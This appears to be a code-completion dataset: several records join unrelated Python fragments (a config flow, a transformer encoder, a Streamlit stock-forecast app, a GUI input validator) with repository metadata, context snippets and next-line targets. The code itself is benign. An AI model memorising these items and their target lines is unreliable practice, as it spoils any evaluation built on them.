vol.Inclusive(
CONF_LATITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LATITUDE],
): cv.latitude,
vol.Inclusive(
CONF_LONGITUDE,
"coordinates",
"Latitude and longitude must exist together",
default=self.configuring_area[CONF_LONGITUDE],
): cv.longitude,
}
),
errors=errors,
)
async def async_step_area_delete(self, user_input: dict[str, Any] | None = None):
"""Delete a configured area."""
if user_input is not None:
for i, data in enumerate(self.configured_areas):
if data["name"] == user_input[CONF_NAME]:
self.configured_areas.pop(i)
break
return await self.async_step_area_menu()
if len(self.configured_areas) > 0:
return self.async_show_form(
step_id="area_delete",
data_schema=vol.Schema(
{
vol.Required(CONF_NAME): selector.SelectSelector(
selector.SelectSelectorConfig(
mode=selector.SelectSelectorMode.LIST,
options=self.configured_area_names,
)
)
}
),
)
return await self.async_step_area_menu()
async def async_step_finished(self, user_input: dict[str, Any] | None = None):
"""Save configuration."""
errors: dict[str, str] = {}
if user_input is not None:
if len(self.configured_sources) > 0:
user_input[CONF_SOURCES] = self.configured_sources
elif self.hass.config.country is not None:
user_input[CONF_SOURCES] = COUNTRY_MAP.get(self.hass.config.country)
else:
user_input[CONF_SOURCES] = list(SOURCE_MAP) | user_input[CONF_AREAS] = self.configured_areas | 2 | 2023-12-19 20:54:21+00:00 | 4k |
thuiar/TCL-MAP | methods/TCL_MAP/SubNets/transformers_encoder/transformer.py | [
{
"identifier": "SinusoidalPositionalEmbedding",
"path": "methods/TCL_MAP/SubNets/transformers_encoder/position_embedding.py",
"snippet": "class SinusoidalPositionalEmbedding(nn.Module):\n \"\"\"This module produces sinusoidal positional embeddings of any length.\n Padding symbols are ignored, but it is necessary to specify whether padding\n is added on the left side (left_pad=True) or right side (left_pad=False).\n \"\"\"\n\n def __init__(self, embedding_dim, padding_idx=0, left_pad=0, init_size=128):\n super().__init__()\n self.embedding_dim = embedding_dim\n self.padding_idx = padding_idx\n self.left_pad = left_pad\n self.weights = dict() # device --> actual weight; due to nn.DataParallel :-(\n self.register_buffer('_float_tensor', torch.FloatTensor(1))\n\n @staticmethod\n def get_embedding(num_embeddings, embedding_dim, padding_idx=None):\n \"\"\"Build sinusoidal embeddings.\n This matches the implementation in tensor2tensor, but differs slightly\n from the description in Section 3.5 of \"Attention Is All You Need\".\n \"\"\"\n half_dim = embedding_dim // 2\n emb = math.log(10000) / (half_dim - 1)\n emb = torch.exp(torch.arange(half_dim, dtype=torch.float) * -emb)\n emb = torch.arange(num_embeddings, dtype=torch.float).unsqueeze(1) * emb.unsqueeze(0)\n emb = torch.cat([torch.sin(emb), torch.cos(emb)], dim=1).view(num_embeddings, -1)\n if embedding_dim % 2 == 1:\n # zero pad\n emb = torch.cat([emb, torch.zeros(num_embeddings, 1)], dim=1)\n if padding_idx is not None:\n emb[padding_idx, :] = 0\n return emb\n\n def forward(self, input):\n \"\"\"Input is expected to be of size [bsz x seqlen].\"\"\"\n bsz, seq_len = input.size()\n max_pos = self.padding_idx + 1 + seq_len\n device = input.get_device()\n if device not in self.weights or max_pos > self.weights[device].size(0):\n # recompute/expand embeddings if needed\n self.weights[device] = SinusoidalPositionalEmbedding.get_embedding(\n max_pos,\n self.embedding_dim,\n self.padding_idx,\n )\n self.weights[device] = self.weights[device].type_as(self._float_tensor).to(input.device)\n positions = make_positions(input, self.padding_idx, self.left_pad)\n return self.weights[device].index_select(0, positions.reshape(-1)).reshape(bsz, seq_len, -1).detach()\n\n def max_positions(self):\n \"\"\"Maximum number of supported positions.\"\"\"\n return int(1e5) # an arbitrary large number"
},
{
"identifier": "MultiheadAttention",
"path": "methods/TCL_MAP/SubNets/transformers_encoder/multihead_attention.py",
"snippet": "class MultiheadAttention(nn.Module):\n \"\"\"Multi-headed attention.\n See \"Attention Is All You Need\" for more details.\n \"\"\"\n\n def __init__(self, embed_dim, num_heads, attn_dropout=0.,\n bias=True, add_bias_kv=False, add_zero_attn=False):\n super().__init__()\n self.embed_dim = embed_dim\n self.num_heads = num_heads\n self.attn_dropout = attn_dropout\n self.head_dim = embed_dim // num_heads\n assert self.head_dim * num_heads == self.embed_dim, \"embed_dim must be divisible by num_heads\"\n self.scaling = self.head_dim ** -0.5\n\n self.in_proj_weight = Parameter(torch.Tensor(3 * embed_dim, embed_dim))\n self.register_parameter('in_proj_bias', None)\n if bias:\n self.in_proj_bias = Parameter(torch.Tensor(3 * embed_dim))\n self.out_proj = nn.Linear(embed_dim, embed_dim, bias=bias)\n\n if add_bias_kv:\n self.bias_k = Parameter(torch.Tensor(1, 1, embed_dim))\n self.bias_v = Parameter(torch.Tensor(1, 1, embed_dim))\n else:\n self.bias_k = self.bias_v = None\n\n self.add_zero_attn = add_zero_attn\n\n self.reset_parameters()\n\n def reset_parameters(self):\n nn.init.xavier_uniform_(self.in_proj_weight)\n nn.init.xavier_uniform_(self.out_proj.weight)\n if self.in_proj_bias is not None:\n nn.init.constant_(self.in_proj_bias, 0.)\n nn.init.constant_(self.out_proj.bias, 0.)\n if self.bias_k is not None:\n nn.init.xavier_normal_(self.bias_k)\n if self.bias_v is not None:\n nn.init.xavier_normal_(self.bias_v)\n\n def forward(self, query, key, value, attn_mask=None):\n \"\"\"Input shape: Time x Batch x Channel\n Self-attention can be implemented by passing in the same arguments for\n query, key and value. Timesteps can be masked by supplying a T x T mask in the\n `attn_mask` argument. Padding elements can be excluded from\n the key by passing a binary ByteTensor (`key_padding_mask`) with shape:\n batch x src_len, where padding elements are indicated by 1s.\n \"\"\"\n qkv_same = query.data_ptr() == key.data_ptr() == value.data_ptr()\n kv_same = key.data_ptr() == value.data_ptr()\n\n tgt_len, bsz, embed_dim = query.size()\n assert embed_dim == self.embed_dim\n assert list(query.size()) == [tgt_len, bsz, embed_dim]\n assert key.size() == value.size()\n\n aved_state = None\n\n if qkv_same:\n # self-attention\n q, k, v = self.in_proj_qkv(query)\n elif kv_same:\n # encoder-decoder attention\n q = self.in_proj_q(query)\n\n if key is None:\n assert value is None\n k = v = None\n else:\n k, v = self.in_proj_kv(key)\n else:\n q = self.in_proj_q(query)\n k = self.in_proj_k(key)\n v = self.in_proj_v(value)\n q = q * self.scaling\n\n if self.bias_k is not None:\n assert self.bias_v is not None\n k = torch.cat([k, self.bias_k.repeat(1, bsz, 1)])\n v = torch.cat([v, self.bias_v.repeat(1, bsz, 1)])\n if attn_mask is not None:\n attn_mask = torch.cat([attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1)\n\n q = q.contiguous().view(tgt_len, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n if k is not None:\n k = k.contiguous().view(-1, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n if v is not None:\n v = v.contiguous().view(-1, bsz * self.num_heads, self.head_dim).transpose(0, 1)\n\n src_len = k.size(1)\n\n if self.add_zero_attn:\n src_len += 1\n k = torch.cat([k, k.new_zeros((k.size(0), 1) + k.size()[2:])], dim=1)\n v = torch.cat([v, v.new_zeros((v.size(0), 1) + v.size()[2:])], dim=1)\n if attn_mask is not None:\n attn_mask = torch.cat([attn_mask, attn_mask.new_zeros(attn_mask.size(0), 1)], dim=1)\n \n attn_weights = torch.bmm(q, k.transpose(1, 2))\n assert list(attn_weights.size()) == [bsz * self.num_heads, tgt_len, src_len]\n\n if attn_mask is not None:\n try:\n attn_weights += attn_mask.unsqueeze(0)\n except:\n print(attn_weights.shape)\n print(attn_mask.unsqueeze(0).shape)\n assert False\n \n attn_weights = F.softmax(attn_weights.float(), dim=-1).type_as(attn_weights)\n # attn_weights = F.relu(attn_weights)\n # attn_weights = attn_weights / torch.max(attn_weights)\n attn_weights = F.dropout(attn_weights, p=self.attn_dropout, training=self.training)\n\n attn = torch.bmm(attn_weights, v)\n assert list(attn.size()) == [bsz * self.num_heads, tgt_len, self.head_dim]\n\n attn = attn.transpose(0, 1).contiguous().view(tgt_len, bsz, embed_dim)\n attn = self.out_proj(attn)\n\n # average attention weights over heads\n attn_weights = attn_weights.view(bsz, self.num_heads, tgt_len, src_len)\n attn_weights = attn_weights.sum(dim=1) / self.num_heads\n return attn, attn_weights\n\n def in_proj_qkv(self, query):\n return self._in_proj(query).chunk(3, dim=-1)\n\n def in_proj_kv(self, key):\n return self._in_proj(key, start=self.embed_dim).chunk(2, dim=-1)\n\n def in_proj_q(self, query, **kwargs):\n return self._in_proj(query, end=self.embed_dim, **kwargs)\n\n def in_proj_k(self, key):\n return self._in_proj(key, start=self.embed_dim, end=2 * self.embed_dim)\n\n def in_proj_v(self, value):\n return self._in_proj(value, start=2 * self.embed_dim)\n\n def _in_proj(self, input, start=0, end=None, **kwargs):\n weight = kwargs.get('weight', self.in_proj_weight)\n bias = kwargs.get('bias', self.in_proj_bias)\n weight = weight[start:end, :]\n if bias is not None:\n bias = bias[start:end]\n return F.linear(input, weight, bias)"
}
] | import torch
import torch.nn.functional as F
import math
from torch import nn
from .position_embedding import SinusoidalPositionalEmbedding
from .multihead_attention import MultiheadAttention | 3,461 |
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
|
class TransformerEncoder(nn.Module):
"""
Transformer encoder consisting of *args.encoder_layers* layers. Each layer
is a :class:`TransformerEncoderLayer`.
Args:
embed_tokens (torch.nn.Embedding): input embedding
num_heads (int): number of heads
layers (int): number of layers
attn_dropout (float): dropout applied on the attention weights
relu_dropout (float): dropout applied on the first layer of the residual block
res_dropout (float): dropout applied on the residual block
attn_mask (bool): whether to apply mask on the attention weights
"""
def __init__(self, embed_dim, num_heads, layers, attn_dropout=0.0, relu_dropout=0.0, res_dropout=0.0,
embed_dropout=0.0, attn_mask=False):
super().__init__()
self.dropout = embed_dropout # Embedding dropout
self.attn_dropout = attn_dropout
self.embed_dim = embed_dim
self.embed_scale = math.sqrt(embed_dim)
self.embed_positions = SinusoidalPositionalEmbedding(embed_dim)
self.attn_mask = attn_mask
self.layers = nn.ModuleList([])
for layer in range(layers):
new_layer = TransformerEncoderLayer(embed_dim,
num_heads=num_heads,
attn_dropout=attn_dropout,
relu_dropout=relu_dropout,
res_dropout=res_dropout,
attn_mask=attn_mask)
self.layers.append(new_layer)
self.register_buffer('version', torch.Tensor([2]))
self.normalize = True
if self.normalize:
self.layer_norm = LayerNorm(embed_dim)
def forward(self, x_in, x_in_k = None, x_in_v = None):
"""
Args:
x_in (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_k (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
x_in_v (FloatTensor): embedded input of shape `(src_len, batch, embed_dim)`
Returns:
dict:
- **encoder_out** (Tensor): the last encoder layer's output of
shape `(src_len, batch, embed_dim)`
- **encoder_padding_mask** (ByteTensor): the positions of
padding elements of shape `(batch, src_len)`
"""
# embed tokens and positions
x = self.embed_scale * x_in
if self.embed_positions is not None:
x += self.embed_positions(x_in.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x = F.dropout(x, p=self.dropout, training=self.training)
if x_in_k is not None and x_in_v is not None:
# embed tokens and positions
x_k = self.embed_scale * x_in_k
x_v = self.embed_scale * x_in_v
if self.embed_positions is not None:
x_k += self.embed_positions(x_in_k.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_v += self.embed_positions(x_in_v.transpose(0, 1)[:, :, 0]).transpose(0, 1) # Add positional embedding
x_k = F.dropout(x_k, p=self.dropout, training=self.training)
x_v = F.dropout(x_v, p=self.dropout, training=self.training)
# encoder layers
intermediates = [x]
for layer in self.layers:
if x_in_k is not None and x_in_v is not None:
x = layer(x, x_k, x_v)
else:
x = layer(x)
intermediates.append(x)
if self.normalize:
x = self.layer_norm(x)
return x
def max_positions(self):
"""Maximum input length supported by the encoder."""
if self.embed_positions is None:
return self.max_source_positions
return min(self.max_source_positions, self.embed_positions.max_positions())
class TransformerEncoderLayer(nn.Module):
"""Encoder layer block.
In the original paper each operation (multi-head attention or FFN) is
postprocessed with: `dropout -> add residual -> layernorm`. In the
tensor2tensor code they suggest that learning is more robust when
preprocessing each layer with layernorm and postprocessing with:
`dropout -> add residual`. We default to the approach in the paper, but the
tensor2tensor approach can be enabled by setting
*args.encoder_normalize_before* to ``True``.
Args:
embed_dim: Embedding dimension
"""
def __init__(self, embed_dim, num_heads=4, attn_dropout=0.1, relu_dropout=0.1, res_dropout=0.1,
attn_mask=False):
super().__init__()
self.embed_dim = embed_dim
self.num_heads = num_heads
| self.self_attn = MultiheadAttention( | 1 | 2023-12-20 03:12:38+00:00 | 4k |
abdellatif-laghjaj/stock-market-prediction | main.py | [
{
"identifier": "load_data",
"path": "services.py",
"snippet": "@st.cache_data\ndef load_data(ticker, start, end):\n \"\"\"\n Load historical stock price data from Yahoo Finance.\n\n Parameters:\n - ticker (str): Stock symbol (e.g., AAPL).\n - start (str): Start date in the format 'YYYY-MM-DD'.\n - end (str): End date in the format 'YYYY-MM-DD'.\n\n Returns:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n try:\n data = yf.download(ticker, start, end)\n data.reset_index(inplace=True)\n return data\n except Exception as e:\n st.error(f\"Error loading data for {ticker}: {str(e)}\")\n return None"
},
{
"identifier": "plot_data",
"path": "services.py",
"snippet": "def plot_data(data):\n \"\"\"\n Plot historical stock price data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock price data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Open'], name=\"stock_open\"))\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Close'], name=\"stock_close\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_multiple_data",
"path": "services.py",
"snippet": "def plot_multiple_data(data, stock_names):\n \"\"\"\n Plot forecasted stock prices for multiple stocks.\n\n Parameters:\n - data (list): List of DataFrames containing forecasted stock price data.\n - stock_names (list): List of stock names corresponding to the forecasted data.\n \"\"\"\n fig = go.Figure()\n for i, stock_data in enumerate(data):\n fig.add_trace(go.Scatter(x=stock_data['ds'], y=stock_data['yhat'], name=f\"yhat - {stock_names[i]}\"))\n fig.update_layout(title_text=\"Stock Prices Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
},
{
"identifier": "plot_volume",
"path": "services.py",
"snippet": "def plot_volume(data):\n \"\"\"\n Plot historical stock volume data.\n\n Parameters:\n - data (pd.DataFrame): DataFrame containing historical stock volume data.\n \"\"\"\n fig = go.Figure()\n fig.add_trace(go.Scatter(x=data['Date'], y=data['Volume'], name=\"stock_volume\"))\n fig.update_layout(title_text=\"Stock Volume Over Time\", xaxis_rangeslider_visible=True)\n st.plotly_chart(fig, use_container_width=True)"
}
] | from time import sleep
from sklearn.metrics import mean_absolute_error
from streamlit_option_menu import option_menu
from datetime import date
from prophet import Prophet
from prophet.plot import plot_plotly
from services import load_data, plot_data, plot_multiple_data, plot_volume
import uuid
import pandas as pd
import streamlit as st | 1,721 |
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot
|
# Set page layout to wide
st.set_page_config(layout="wide", page_title="Forcastify", page_icon="📈")
# Sidebar
st.sidebar.markdown("<h1 style='text-align: center; font-size: 30px;'><b>Forcasti.</b><b style='color: orange'>fy</b></h1>", unsafe_allow_html=True)
st.sidebar.title("Options")
start_date_key = str(uuid.uuid4())
start_date = st.sidebar.date_input("Start date", date(2018, 1, 1), key=start_date_key)
end_date = st.sidebar.date_input("End date", date.today())
# Header
st.markdown("<h1 style='text-align: center;'>Stock Forecast App 📈</h1>", unsafe_allow_html=True)
st.markdown("<p style='text-align: center;'><b>Forcasti.</b><b style='color: orange'>fy</b> is a simple web app for stock price prediction using the <a href='https://facebook.github.io/prophet/'>Prophet</a> library.</p>", unsafe_allow_html=True)
selected_tab = option_menu(
menu_title=None,
options=["Dataframes", "Plots", "Statistics", "Forecasting", "Comparison"],
icons=["table", "bar-chart", "calculator", "graph-up-arrow", "arrow-down-up"],
menu_icon="📊",
default_index=0,
orientation="horizontal",
)
# Stock selection
stocks = ("AAPL", "GOOG", "MSFT", "GME", "AMC", "TSLA", "AMZN", "NFLX", "NVDA", "AMD", "PYPL")
# Stocks abreviations
selected_stock = st.sidebar.selectbox("Select stock for prediction", stocks)
selected_stocks = st.sidebar.multiselect("Select stocks for comparison", stocks)
years_to_predict = st.sidebar.slider("Years of prediction:", 1, 5)
period = years_to_predict * 365
# Display a loading spinner while loading data
with st.spinner("Loading data..."):
data = load_data(selected_stock, start_date, end_date)
sleep(1)
# Display the success message
success_message = st.success("Data loaded successfully!")
# Introduce a delay before clearing the success message
sleep(1)
# Clear the success message
success_message.empty()
# Forecasting
df_train = data[["Date", "Close"]]
df_train = df_train.rename(columns={"Date": "ds", "Close": "y"})
model = Prophet()
model.fit(df_train)
future = model.make_future_dataframe(periods=period)
forecast = model.predict(future)
# Convert end_date to datetime
end_date_datetime = pd.to_datetime(end_date)
# Filter forecast based on end_date
forecast = forecast[forecast['ds'] >= end_date_datetime]
# Dataframes Tab
if selected_tab == "Dataframes":
# Display historical data
st.markdown("<h2><span style='color: orange;'>{}</span> Historical Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays historical stock price data for {} from {} to {}.".format(selected_stock, start_date, end_date))
# Copy data
new_data = data.copy()
# Drop Adj Close and Volume columns
new_data = data.drop(columns=['Adj Close', 'Volume'])
st.dataframe(new_data, use_container_width=True)
# Display forecast data
st.markdown("<h2><span style='color: orange;'>{}</span> Forecast Data</h2>".format(selected_stock), unsafe_allow_html=True)
st.write("This section displays the forecasted stock price data for {} using the Prophet model from {} to {}.".format(selected_stock, end_date, end_date + pd.Timedelta(days=period)))
# Copy forecast dataframe
new_forecast = forecast.copy()
# Drop unwanted columns
new_forecast = new_forecast.drop(columns=[
'additive_terms',
'additive_terms_lower',
'additive_terms_upper',
'weekly',
'weekly_lower',
'weekly_upper',
'yearly',
'yearly_lower',
'yearly_upper',
'multiplicative_terms',
'multiplicative_terms_lower',
'multiplicative_terms_upper'
])
# Rename columns
new_forecast = new_forecast.rename(columns={
"ds": "Date",
"yhat": "Close",
"yhat_lower": "Close Lower",
"yhat_upper": "Close Upper",
"trend": "Trend",
"trend_lower": "Trend Lower",
"trend_upper": "Trend Upper"
})
st.dataframe(new_forecast, use_container_width=True)
# Plots Tab
if selected_tab == "Plots":
# Raw data plot
plot_data(data)
# Data Volume plot | plot_volume(data) | 3 | 2023-12-17 11:38:48+00:00 | 4k |
CoolPointerException/Amigo | gui/tab_task.py | [
{
"identifier": "Properties",
"path": "gui/input_validator.py",
"snippet": "class Properties(Enum):\n PROJECT_NAME = 1\n SELECTED_DIRECTORY = 2\n API_TYPE = 3\n API_BASE = 4\n API_VERSION = 5\n API_KEY = 6\n GPT_MODEL = 7\n GPT_DEPLOYMENT = 8\n EMBEDDING_MODEL = 9\n EMBEDDING_DEPLOYMENT = 10\n PROMPT = 11\n MAX_TOKENS = 12\n TASK_REQUIREMENTS = 13\n SELECTED_PROJECT = 14\n THREADS = 15\n REINDEX_PROJECT = 16"
},
{
"identifier": "validate",
"path": "gui/input_validator.py",
"snippet": "def validate(gui, properties):\n for prop in properties:\n match prop:\n case Properties.PROJECT_NAME:\n project_name = gui.projects_tab.project_name_entry.get()\n if not project_name:\n messagebox.showerror(\"Error\", \"Please enter a project name.\")\n return False\n\n if project_name in forbidden_names:\n messagebox.showerror(\"Error\", \"Please enter a valid project name. \\nForbidden names:\\n - \" + \"\\n - \"\n .join(forbidden_names))\n return False\n case Properties.SELECTED_DIRECTORY:\n selected_directory = gui.projects_tab.selected_directory\n if not selected_directory:\n messagebox.showerror(\"Error\", \"Please select a directory.\")\n return False\n case Properties.API_TYPE:\n api_type = gui.settings_tab.api_type.get()\n if not api_type:\n messagebox.showerror(\"Error\", \"Please select API type in Settings Tab.\")\n return False\n case Properties.API_BASE:\n api_base = gui.settings_tab.api_host_entry.get()\n if not api_base:\n messagebox.showerror(\"Error\", \"Please enter API base in Settings Tab.\")\n return False\n case Properties.API_VERSION:\n api_version = gui.settings_tab.api_version_entry.get()\n if not api_version:\n messagebox.showerror(\"Error\", \"Please enter API version in Settings Tab.\")\n return False\n case Properties.API_KEY:\n api_key = gui.settings_tab.api_key_entry.get()\n if not api_key:\n messagebox.showerror(\"Error\", \"Please enter API key in Settings Tab.\")\n return False\n case Properties.GPT_MODEL:\n gpt_model = gui.settings_tab.gpt_model.get()\n if not gpt_model:\n messagebox.showerror(\"Error\", \"Please enter GPT model name in Settings Tab.\")\n return False\n case Properties.GPT_DEPLOYMENT:\n gpt_deployment = gui.settings_tab.gpt_deployment.get()\n if not gpt_deployment:\n messagebox.showerror(\"Error\", \"Please enter GPT deployment name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_MODEL:\n embedding_model = gui.settings_tab.embeddings_model_entry.get()\n if not embedding_model:\n messagebox.showerror(\"Error\", \"Please enter embedding model name in Settings Tab.\")\n return False\n case Properties.EMBEDDING_DEPLOYMENT:\n embedding_deployment = gui.settings_tab.embeddings_deployment_entry.get()\n if not embedding_deployment:\n messagebox.showerror(\"Error\", \"Please enter embedding deployment name in Settings Tab.\")\n return False\n case Properties.PROMPT:\n prompt = gui.settings_tab.prompt_entry.get(\"1.0\", tk.END)\n if not prompt:\n messagebox.showerror(\"Error\", \"Please enter a prompt in Settings Tab.\")\n return False\n case Properties.MAX_TOKENS:\n max_tokens = gui.settings_tab.max_tokens.get()\n if not max_tokens:\n messagebox.showerror(\"Error\", \"Please enter max tokens in Settings Tab.\")\n return False\n case Properties.TASK_REQUIREMENTS:\n task_requirements = gui.task_tab.task_requirements_entry.get(\"1.0\", tk.END)\n if not task_requirements:\n messagebox.showerror(\"Error\", \"Please enter a Task requirements.\")\n return False\n case Properties.SELECTED_PROJECT:\n selected_project = gui.task_tab.selected_project.get()\n if not selected_project:\n messagebox.showerror(\"Error\", \"Please select a project.\")\n return False\n case Properties.THREADS:\n threads = gui.settings_tab.threads.get()\n if not threads:\n messagebox.showerror(\"Error\", \"Please enter number of threads in Settings Tab.\")\n return False\n case Properties.REINDEX_PROJECT:\n reindex_project = gui.projects_tab.reindex_project.get()\n if not reindex_project:\n messagebox.showerror(\"Error\", \"Please select a project to reindex.\")\n return False\n return True"
},
{
"identifier": "init_llama_index",
"path": "gui/llama_index_init.py",
